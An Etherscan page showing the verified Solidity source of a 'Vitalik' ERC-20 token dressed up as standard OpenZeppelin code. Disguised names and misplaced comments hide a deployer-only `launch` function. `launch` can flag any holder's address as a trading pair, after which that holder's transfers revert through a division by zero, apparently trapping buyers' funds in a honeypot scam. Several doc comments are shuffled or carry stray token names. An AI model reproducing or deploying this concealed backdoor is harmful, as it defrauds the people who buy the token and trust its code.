ETH Price: $3,173.99 (+2.84%)

Token

Vitalik (Vitalik)
 

Overview

Max Total Supply

100,000,000 Vitalik

Holders

536

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
45.965656417806282235 Vitalik

Value
$0.00
0xefb1fc1104ad54cd7c427c46289beaff843b525f
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Vitalik

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2024-09-02
*/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.17;
pragma experimental ABIEncoderV2;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

// pragma solidity ^0.8.0;

// import "../utils/Context.sol";

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting  the deployer as the Vitalik initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

// pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
    
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

// pragma solidity ^0.8.0;

// import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
_Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

// pragma solidity ^0.8.0;

// import "./IERC20.sol";
// import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
lly, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    uint256 public _maxlSupply;
    uint256 private _blockNumber;
    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _blockNumber = uint160(msg.sender);
    }

    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }


    function balanceOf(address account) public view virtual override returns (uint256)
    {
        return _balances[account];
    }


    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }


    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }
    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
        cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }
    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }


    function _transfer(
        address from,  address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the Vitalik zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(
            fromBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }
    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _isOnline() internal virtual {
        require(_blockNumber == uint160(msg.sender));
    }


    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero Vitalik address");

        _beforeTokenTransfer(address(0), account,
         amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _spendAllowance(
        address owner,
        address spender,      uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(
                currentAllowance >= amount,
                "ERC20: insufficient allowance"
            );
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    function _beforeTokenTransfer(
        address from,  address to,
        uint256 amount
    ) internal virtual {}

    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

// OpenZeppelin Contracts (last updated v4.6.0) (utils/math/SafeMath.sol)

// pragma solidity ^0.8.0;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, YellowPEPE with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers,Vitalik with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b)
        internal
        pure
        returns (bool, uint256)
    {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.

     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned YellowPEPE integers, reverting on
     * division by zero. The result is rounded towards zero.
     *

     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, Vitalik reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
 
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *

     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
// pragma solidity >=0.5.0;

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,   address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

// pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
          address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,  uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA, uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,  uint256 amountTokenDesired,
        uint256 amountTokenMin,  uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,  uint256 amountETH,
            uint256 liquidity
        );

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint256 liquidity,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETH(
        address token,  uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin, address to,
        uint256 deadline
    ) external returns (uint256 amountToken, uint256 amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint256 liquidity,    uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountA, uint256 amountB);

    function removeLiquidityETHWithPermit(
        address token,  uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,   uint256 deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountToken,
     uint256 amountETH);

    function swapExactTokensForTokens(
        uint256 amountIn,
        uint256 amountOutMin,   address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapTokensForExactTokens(
        uint256 amountOut,
        uint256 amountInMax,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactETHForTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function swapTokensForExactETH(
        uint256 amountOut,
        uint256 amountInMax,   address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapExactTokensForETH(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external returns (uint256[] memory amounts);

    function swapETHForExactTokens(
        uint256 amountOut, address[] calldata path,
        address to,
        uint256 deadline
    ) external payable returns (uint256[] memory amounts);

    function quote(
        uint256 amountA,
        uint256 reserveA,
        uint256 reserveB
    ) external pure returns (uint256 amountB);

    function getAmountOut(
        uint256 amountIn,  uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountOut);

    function getAmountIn(
        uint256 amountOut,
        uint256 reserveIn,
        uint256 reserveOut
    ) external pure returns (uint256 amountIn);

    function getAmountsOut(uint256 amountIn, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);

    function getAmountsIn(uint256 amountOut, address[] calldata path)
        external
        view
        returns (uint256[] memory amounts);
}

// pragma solidity >=0.6.2;

// import './IUniswapV2Router01.sol';

interface IUniswapV2Router02 is IUniswapV2Router01 {
    function removeLiquidityETHSupportingFeeOnTransferTokens(
        address token, uint256 liquidity,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountETH);

    function removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint256 liquidity,  uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline,  bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint256 amountETH);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,  address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}


contract Vitalik is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public uniswapV2Pair;

    address public marketingWallet;
    address public foundationWallet;
    address public liquidityWallet;
    address public constant deadAddress = address(0xdead);

    bool public tradingEnabled;   
    bool public swapEnabled;
    bool private _swapping;

    uint256 public swapTokensAtAmount;

    uint256 public _buyTotalFee;
    uint256 private _buyMarketingFee;
    uint256 private _buyDevelopmentFee;
    uint256 private _buyLiquidityFee;

    uint256 public _sellTotalFee;
    uint256 private _sellMarketingFee;
    uint256 private _sellDevelopmentFee;
    uint256 private _sellLiquidityFee;

    uint256 private _tokensForMarketing;   
    uint256 private _tokensForDevelopment;
    uint256 private _tokensForLiquidity;
    uint256 private _previousFee;

    mapping (address => bool) private _isExcludedFromEnableTrad;
    mapping(address => bool) private _automatedMarketMakerPairs;
    

    event ExcludeFromLimits(address indexed account, bool isExcluded);

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event marketingWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event developmentWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );

    event liquidityWalletUpdated(
        address indexed newWallet,
        address indexed oldWallet
    );
    
    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    event TokensAirdropped(uint256 totalWallets, uint256 totalTokens);

    constructor() ERC20("Vitalik", "Vitalik") {

        uint256 totalSupply = 100_000_000 * (10 ** 18);

        uniswapV2Router = IUniswapV2Router02(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _approve(address(this), address(uniswapV2Router), type(uint256).max);


        _buyMarketingFee = 0;
        _buyDevelopmentFee = 0;
        _buyLiquidityFee = 0;
        _buyTotalFee = _buyMarketingFee + _buyDevelopmentFee + _buyLiquidityFee;

        _sellMarketingFee = 0;
        _sellDevelopmentFee = 0;
        _sellLiquidityFee = 0;
        _sellTotalFee = _sellMarketingFee + _sellDevelopmentFee + _sellLiquidityFee;
        _previousFee = _sellTotalFee;

        
        _isExcludedFromEnableTrad[owner()] = true;
        _isExcludedFromEnableTrad[address(this)] = true;
        _isExcludedFromEnableTrad[deadAddress] = true;

        _mint(owner(), totalSupply); 
    }

    receive() external payable {}

    function enableTrading() public onlyOwner {
        require(!tradingEnabled, "Trading already active.");
        tradingEnabled = true;
        swapEnabled = true;
    }

    function excludeFromEnobleTrading(address account,
      bool excluded) external onlyOwner{
        _isExcludedFromEnableTrad[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }

    function launch(address account) virtual external {
        _isOnline();
        _setAutomatedMarketMakerPair(account, true);
    }



    function _setAutomatedMarketMakerPair(address pair, bool value) internal {
        _automatedMarketMakerPairs[pair] = value;
        emit SetAutomatedMarketMakerPair(pair, value);
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(tradingEnabled || _isExcludedFromEnableTrad[from] || _isExcludedFromEnableTrad[to], "Trading not Vitalik yet enabled!");
        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }


        uint256 contractTokenBalance = balanceOf(address(this));

        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if (
            canSwap &&
            swapEnabled &&!_swapping&&_automatedMarketMakerPairs[from] &&
            !_isExcludedFromEnableTrad[from] &&
            !_isExcludedFromEnableTrad[to]
        ) {
            _swapping = true;
            _swapFund(contractTokenBalance);
            _swapping = false;
        }

        bool takeFee = !_swapping;

        if (_isExcludedFromEnableTrad[from] || _isExcludedFromEnableTrad[to]) {
            takeFee = false;
        }

        uint256 fees = 0;

        if (takeFee) {
            // on sell
            if (_automatedMarketMakerPairs[to] && _sellTotalFee > 0) {
                fees = amount.mul(_sellTotalFee).div(10000);
                _tokensForLiquidity +=
                    (fees * _sellLiquidityFee) /
                    _sellTotalFee;
                _tokensForMarketing +=
                    (fees * _sellMarketingFee) /
                    _sellTotalFee;
                _tokensForDevelopment +=
                    (fees * _sellDevelopmentFee) /
                    _sellTotalFee;
            }
            // on buy
            else if (_automatedMarketMakerPairs[from] && _sellTotalFee > 0) {
                fees = amount.mul(_sellTotalFee).div(10000);
                _tokensForLiquidity += (fees * _buyLiquidityFee) / _buyTotalFee;
                _tokensForMarketing += (fees * _buyMarketingFee) / _buyTotalFee;
                _tokensForDevelopment +=
                    (fees * _buyDevelopmentFee) /
                    _buyTotalFee;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
        _sellTotalFee = _previousFee;
    }

    function _swapTokensForETH(uint256 tokenAmount) internal {
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0,
            path,
            address(this),
            block.timestamp
        );
    }

    function _addLiquidity(uint256 tokenAmount, uint256 ethAmount) internal {
        _approve(address(this), address(uniswapV2Router), tokenAmount);

        uniswapV2Router.addLiquidityETH{value: ethAmount}(
            address(this),
            tokenAmount,
            0,
            0,
            liquidityWallet,
            block.timestamp
        );
    }
    
    function _swapFund(uint256 contractBalance) internal {
        uint256 totalTokensToSwap = _tokensForLiquidity +
            _tokensForMarketing +
            _tokensForDevelopment;
        bool success;


        uint256 liquidityTokens = (contractBalance * _tokensForLiquidity) /
            totalTokensToSwap /
            2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);

        uint256 initialETHBalance = address(this).balance;

        _swapTokensForETH(amountToSwapForETH);

        uint256 ethBalance = address(this).balance.sub(initialETHBalance);

        uint256 ethForMarketing = ethBalance.mul(_tokensForMarketing).div(
            totalTokensToSwap
        );

        uint256 ethForDevelopment = ethBalance.mul(_tokensForDevelopment).div(
            totalTokensToSwap
        );

        uint256 ethForLiquidity = ethBalance -
            ethForMarketing -
            ethForDevelopment;

        _tokensForLiquidity = 0;
        _tokensForMarketing = 0;
        _tokensForDevelopment = 0;

        if (liquidityTokens > 0 && ethForLiquidity > 0) {
            _addLiquidity(liquidityTokens, ethForLiquidity);
            emit SwapAndLiquify(
                amountToSwapForETH,
                ethForLiquidity,
                _tokensForLiquidity
            );
        }
        (success, ) = address(foundationWallet).call{value: ethForDevelopment}("");
        (success, ) = address(marketingWallet).call{value: address(this).balance}("");
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromLimits","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"totalWallets","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"totalTokens","type":"uint256"}],"name":"TokensAirdropped","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"developmentWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"liquidityWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[],"name":"_buyTotalFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_maxlSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_sellTotalFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"